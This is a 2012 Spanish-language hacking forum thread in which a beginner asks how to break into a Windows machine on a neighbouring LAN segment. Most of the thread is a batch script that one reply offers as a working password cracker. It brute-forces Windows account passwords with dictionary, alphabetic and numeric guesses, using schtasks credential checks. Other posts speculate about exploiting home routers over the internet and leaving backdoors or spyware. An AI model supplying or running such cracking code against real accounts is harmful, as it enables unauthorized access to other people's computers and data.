Principiante en hacking se plantea un reto

Iniciado por ardex, 30 Noviembre 2012, 20:31 PM

0 Miembros y 1 Visitante están viendo este tema.

ardex

Tengo la red local

---LAN 1 ----------------192.168.1.0------|router|-------LAN2---192.168.5.0 -------------

lan1 está en un dominio WIndows 2003  MIDOMINIO

Lan2 no está en ningun dominio.

¿ como puedo entrar en el ordenador 192.168.5.10 ?

La máquina no tiene firewall activado. Puedo hacer un \\192.168.5.0\c$ y me pide user y password.
¿ existe algun programa que ataque directamente la máquina y pueda obtener la clave por fuerza bruta ?

Gracias de antemano.

Elmonky

tienes acceso fisico a una de las maquinas de la red? o quieres atacar desde internet?

Fantasma Errante

Hola "elmonky" mas bien creo q el esquema de nuestro amigo seria asi por lo menos yo si tengo un escenario fisico asi
---LAN 1 ----------------192.168.1.0------|router|-------LAN2---192.168.5.0 -------------[router]
y si que tengo acceso fisico pero estoy interesado en hacerlo desde internet.
arrojanos luz...
si quieres podemos probar sobre mi escenario algunas cosas para aprender todos juntos?

ardex

Efectivamente.. el router es mio.. y las dos redes estan en el mismo edificio.

Y a pesar de que tengo acceso fisico, quiero hacerlo via red... (si tuviera acceso fisico le mteria un ophcrack... o similar..)

Fantasma Errante

ardex cuando quieras te pones en contacto conmigo y practicamos algo juntos que veo que tenemos las mismas dudas.
happy hack!!!

Segadorfelix

Cita de: ardex en 30 Noviembre 2012, 20:31 PM
Tengo la red local

---LAN 1 ----------------192.168.1.0------|router|-------LAN2---192.168.5.0 -------------

lan1 está en un dominio WIndows 2003  MIDOMINIO

Lan2 no está en ningun dominio.

¿ como puedo entrar en el ordenador 192.168.5.10 ?

La máquina no tiene firewall activado. Puedo hacer un \\192.168.5.0\c$ y me pide user y password.
¿ existe algun programa que ataque directamente la máquina y pueda obtener la clave por fuerza bruta ?

Gracias de antemano.

Te serviria un comando en batch?

Fantasma Errante

Podrias facilitarle el .batch a ardex?
Y podrias enseñarme ami aora a hacer unas pruebas?
GRACIAS!

Segadorfelix

Según lo que tengo entendido:
1-lo que intentan hacer es acceder a un computador en la misma red (?), desde otro computador.
2-lo que intentan hacer es acceder a un computador mediante Internet(?), desde otro computador.
-En el primer caso, seria utilizar el comando de batch "net use", Ejemplo:
Net use \\192.168.5.10\Recurso_compartido contraseña /USER:Nombre_de_usuario[code=dos]
segun lo que leí en el tema, ardex posee acceso físico, por lo que podría compartir una carpeta(o el disco C:) con el comando "Net Share", la forma de obtener la contraseña por fuerza bruta(aunque no confió mucho en el método), seria con el comando FOR; en este caso, puedo ayudarlos con el codigo.
-En el segundo caso, no se puede hacer nada en batch por si solo(se puede utilizar netcat, pero no viene por defecto en los equipos).
-Si es otro caso, necesitaría una explicación mas clara.
PD:La contraseña para acceder a un computador es la misma del computador, para saber la del computador, aquí un código por fuerza bruta(no es mio).
[code=dos]
@echo off
set abc=a b c d e f g h i j k l m n ¤ o p q r s t u v w x y z
echo BIENVENIDO AL CRAKEADOR DE CLAVES DE WINDOWS
echo primero elige el usuario al que le desees sacar la contrase¤a
echo la lista de usuarios de tu pc son:
net user
set /p usern=escribe el usuario tal y como esta en la lista...
echo.
echo.
:ini
set /a var=0
echo usar un diccionario--1
echo ataque alfabetico----2
echo ataque numerico------3
echo.
set /p var=Eliga una opcion...
if %var%==1 (goto dic)
if %var%==2 (goto alfa)
if %var%==3 (goto num) else (cls && goto ini)
exit
:dic
echo el diccionario debe estar en la misma carpeta que el programa
echo si alguna de las claves del diccionario contiene la letra "¤"
echo dicha clave no sera valida
echo.
set /p dic=Escribe el diccionario junto con su extension...
SetLocal EnabledelayedExpansion

for /f "tokens=*" %%a in (!dic!) do (
echo probando clave...%%a
schtasks /create /TN "%random%" /TR notepad.exe /SC DAILY /ST 11:00:00 /RU %usern% /RP "%%a"
if !errorlevel!==0 (cls & echo clave encontrada: "%%a" & goto firma)
)
cls
echo, la clave no a sido encontrada, pruebe con otro diccionario.
pause>NUL
exit
:alfa
SetLocal EnabledelayedExpansion
set /p num=Eliga el numero de Caracteres (entre 1 y 10)...
if %num%==1 goto 1a
if %num%==2 goto 2a
if %num%==3 goto 3a
if %num%==4 goto 4a
if %num%==5 goto 5a
if %num%==6 goto 6a
if %num%==7 goto 7a
if %num%==8 goto 8a
if %num%==9 goto 9a
if %num%==10 goto 10a
cls & goto gd
:1a
for %%a IN (%abc%) do (
schtasks /create /TN "%random%" /TR notepad.exe /SC DAILY /ST 11:00:00 /RU %usern% /RP %%a
echo probando clave...%%a
if !errorlevel!==0 (cls & echo clave encontrada: "%%a" & pause>NUL & exit)
)
cls
echo la clave no a sido encontrada, eliga otro numero de caracteres.
pause>NUL
exit
:2a
for %%a IN (%abc%) do (
for %%b IN (%abc%) do (
schtasks /create /TN "%random%" /TR notepad.exe /SC DAILY /ST 11:00:00 /RU %usern% /RP %%a%%b
echo probando clave...%%a%%b
if !errorlevel!==0 (cls & echo clave encontrada: "%%a%%b" & goto firma)
))
cls
echo la clave no a sido encontrada, eliga otro numero de caracteres.
pause>NUL
exit
:3a
for %%a IN (%abc%) do (
for %%b IN (%abc%) do (
for %%c IN (%abc%) do (
schtasks /create /TN "%random%" /TR notepad.exe /SC DAILY /ST 11:00:00 /RU %usern% /RP %%a%%b%%c
echo probando clave...%%a%%b%%c
if !errorlevel!==0 (cls & echo clave encontrada: "%%a%%b%%c" & goto firma)
)))
cls
echo la clave no a sido encontrada, eliga otro numero de caracteres.
pause>NUL
exit
:4a
for %%a IN (%abc%) do (
for %%b IN (%abc%) do (
for %%c IN (%abc%) do (
for %%d IN (%abc%) do (
schtasks /create /TN "%random%" /TR notepad.exe /SC DAILY /ST 11:00:00 /RU %usern% /RP %%a%%b%%c%%d
echo probando clave...%%a%%b%%c%%d
if !errorlevel!==0 (cls & echo clave encontrada: "%%a%%b%%c%%d" & goto firma)
))))
cls
echo la clave no a sido encontrada, eliga otro numero de caracteres.
pause>NUL
exit
:5a
for %%a IN (%abc%) do (
for %%b IN (%abc%) do (
for %%c IN (%abc%) do (
for %%d IN (%abc%) do (
for %%e IN (%abc%) do (
schtasks /create /TN "%random%" /TR notepad.exe /SC DAILY /ST 11:00:00 /RU %usern% /RP %%a%%b%%c%%d%%e
echo probando clave...%%a%%b%%c%%d%%e
if !errorlevel!==0 (cls & echo clave encontrada: "%%a%%b%%c%%d%%e" & goto firma)
)))))
cls
echo la clave no a sido encontrada, eliga otro numero de caracteres.
pause>NUL
exit
:6a
for %%a IN (%abc%) do (
for %%b IN (%abc%) do (
for %%c IN (%abc%) do (
for %%d IN (%abc%) do (
for %%e IN (%abc%) do (
for %%f IN (%abc%) do (
schtasks /create /TN "%random%" /TR notepad.exe /SC DAILY /ST 11:00:00 /RU %usern% /RP %%a%%b%%c%%d%%e%%f
echo probando clave...%%a%%b%%c%%d%%e%%f
if !errorlevel!==0 (cls & echo clave encontrada: "%%a%%b%%c%%d%%e%%f" & goto firma)
))))))
cls
echo la clave no a sido encontrada, eliga otro numero de caracteres.
pause>NUL
exit
:7a
for %%a IN (%abc%) do (
for %%b IN (%abc%) do (
for %%c IN (%abc%) do (
for %%d IN (%abc%) do (
for %%e IN (%abc%) do (
for %%f IN (%abc%) do (
for %%g IN (%abc%) do (
schtasks /create /TN "%random%" /TR notepad.exe /SC DAILY /ST 11:00:00 /RU %usern% /RP %%a%%b%%c%%d%%e%%f%%g
echo probando clave...%%a%%b%%c%%d%%e%%f%%g
if !errorlevel!==0 (cls & echo clave encontrada: "%%a%%b%%c%%d%%e%%f%%g" & goto firma)
)))))))
cls
echo la clave no a sido encontrada, eliga otro numero de caracteres.
pause>NUL
exit
:8a
for %%a IN (%abc%) do (
for %%b IN (%abc%) do (
for %%c IN (%abc%) do (
for %%d IN (%abc%) do (
for %%e IN (%abc%) do (
for %%f IN (%abc%) do (
for %%g IN (%abc%) do (
for %%h IN (%abc%) do (
schtasks /create /TN "%random%" /TR notepad.exe /SC DAILY /ST 11:00:00 /RU %usern% /RP %%a%%b%%c%%d%%e%%f%%g%%h
echo probando clave...%%a%%b%%c%%d%%e%%f%%g%%h
if !errorlevel!==0 (cls & echo clave encontrada: "%%a%%b%%c%%d%%e%%f%%g%%h" & goto firma)
))))))))
cls
echo la clave no a sido encontrada, eliga otro numero de caracteres.
pause>NUL
exit
:9a
for %%a IN (%abc%) do (
for %%b IN (%abc%) do (
for %%c IN (%abc%) do (
for %%d IN (%abc%) do (
for %%e IN (%abc%) do (
for %%f IN (%abc%) do (
for %%g IN (%abc%) do (
for %%h IN (%abc%) do (
for %%i IN (%abc%) do (
schtasks /create /TN "%random%" /TR notepad.exe /SC DAILY /ST 11:00:00 /RU %usern% /RP %%a%%b%%c%%d%%e%%f%%g%%h%%i
echo probando clave...%%a%%b%%c%%d%%e%%f%%g%%h%%i
if !errorlevel!==0 (cls & echo clave encontrada: "%%a%%b%%c%%d%%e%%f%%g%%h%%i" & goto firma)
)))))))))
cls
echo la clave no a sido encontrada, eliga otro numero de caracteres.
pause>NUL
exit
:10a
for %%a IN (%abc%) do (
for %%b IN (%abc%) do (
for %%c IN (%abc%) do (
for %%d IN (%abc%) do (
for %%e IN (%abc%) do (
for %%f IN (%abc%) do (
for %%g IN (%abc%) do (
for %%h IN (%abc%) do (
for %%i IN (%abc%) do (
for %%j IN (%abc%) do (
schtasks /create /TN "%random%" /TR notepad.exe /SC DAILY /ST 11:00:00 /RU %usern% /RP %%a%%b%%c%%d%%e%%f%%g%%h%%i%%j
echo probando clave...%%a%%b%%c%%d%%e%%f%%g%%h%%i%%j
if !errorlevel!==0 (cls & echo clave encontrada: "%%a%%b%%c%%d%%e%%f%%g%%h%%i%%j" & goto firma)
))))))))))
cls
echo la clave no a sido encontrada, eliga otro numero de caracteres.
pause>NUL
exit
:num
SetLocal EnabledelayedExpansion
set /a num=0
set /p num1=eliga el numero inicial...
set /p num2=eliga el numero final...
for /l %%a in (%num1%,1,%num2%) do (
echo probando clave...%%a
schtasks /create /TN "%random%" /TR notepad.exe /SC DAILY /ST 11:00:00 /RU %usern% /RP %%a
if !errorlevel!==0 (cls & echo clave encontrada: "%%a" & goto firma)
)
echo, la clave no a sido encontrada, pruebe con otro metodo.
pause>NUL
exit
:firma
echo  ___ ___  __   __ ___   __  __  __  __  ___   __     
echo (  ,\  ,)/  \ / _)  ,) (  )(  \/  )(  )(   \ /  \   
echo  ) _/)  \ () ) (/\)  \ /__\ )    ( /__\ ) ) ) () )   
echo (_) (_)\_)__/ \__/_)\_)_)(_)_/\/\_)_)(_)___/ \__/   

echo    ___  __ ___     ___ __  __  __     
echo   (  ,\/  \  ,)   (  ,\  )/ _)/  \   
echo    ) _/ () )  \    ) _/__\ (_( () )   
echo   (_)  \__/_)\_)  (_)(_)(_)__)\__/ 


echo  ___   __ __  __ __ _  _ __ _  _ ___ ___    __   ___ ___  __  __  __ 
echo (   \ /  \  \/  )  ) \( ) _) )( )  _)_  )  (  ) (  _)  ,)(  \/  )(  )
echo  ) ) ) () )    ( )( )  ( (/\)()( ) _)/ /    )(__ ) _))  \ )    ( /__\
echo (___/ \__/_/\/\_)__)_)\_)__/\__/(___)___)  (____)___)_)\_)_/\/\_)_)(_)

pause>NUL
exit


[/code][/code]

Fantasma Errante

Siempre igual....
Siempre hablando de ataques en la LAN desde dentro de la misma red.
Ami me gustaria saber como un hacker hace para entrar en el ordenador de un usuario PC desde internet vamos que como si fueran dos amigos que quieran auto hackearse los dos como si fuera un juego o una compecticion entre ellos... eso es lo que busco yo esa forma de buscar vulnabilidades,puertos,sockets, programarnos algun tipo de programa que sea para nuentro tipo de juego.(eso lo dejo en nuestra imaginacicion).Pero vamos nadie habla en internet de como hacer ese tipo de practicas.
Nadie a puesto un video o un tuto de como dos amigos se hackean entre ellos ???
Encambio buscas en "San google" y solo encuentras videos y tutos de ataques de ombre enmedio,spoofing, o envenamiento ARP. en entornos virtuales echos desde el mismo PC o cosas asi pero nadie lo hace "REAL" dos amigos distantes en internet que se graben en como se hackean y enseñen las tecnias que an empleado para eso menesteres????
Nadie sabe atacar PC de usuarios sin usar ingenieria inversa o troyanos. Empezando por su ip publica que se supone que es el router de el usuario para escanearlos y encontrar bugs para explotar nada de claves ni nada por el estilo alo Bruto... y despues de explotar el router ya puedes hacer muchas cosas gracias Vic_thor despues de todo eso ya si que le puedes dejar un Backdoor o cualquier cosa que ayas programado que se parezca a un backdor pero con funciones avanzas entonces si..... pero antes de todo esto nadie sabe como engañar al router? Tipo programas como Scrapy que es capaz de ensamblar packetes TCP.
No se si eso querra decir que si construyo un datagrama o pakete con una ip destino y su MAC seria capaz de llegar ala maquina o al router o a donde la imaguinacion me llevara  ip:NASA MAC:NASA para mandar paketes a sus routers pc swich y demas????
No se alomejor soy un poco iluso pero veo que nadie le gustaria practicar estas cosas con un servidor y eso no me parece nada bien si ami alguien me lo pidiera y yo de verdad supiera la respuesta estaria encantado de enseñarle.
un saludo que luego los @moderadores me llaman la atencion que si me repito que si tal blaaaa blaaaaa blaaaaaa que me enseñen ellos OSTIA que ellos seguro que saben.Pero los entiendo el TIEMPO es oro un salud@

Segadorfelix

Vaya no me publico el resto XD.
Esto era(o algo asi):
-------------------------------------------------------------------------------------------------
-En el segundo caso, para acceder remotamente, se necesita un server(spywre) dentro del otro equipo. Se pueden enviar paquetes al la red pero eso lo único que haría es dañar la conexión.
-Si se interceptan los datos, se podría espiar los datos, o poner un fake de una pagina, pero no manejar remotamente por si solo a el otro equipo.
-------------------------------------------------------------------------------------------------
@FantasmaErrante averigua sobre "Tor" y los ataque que se pueden hacer a la red "Tor", el tipo de conexión que produce "Tor para cifrar la conexión, tal vez te sirva.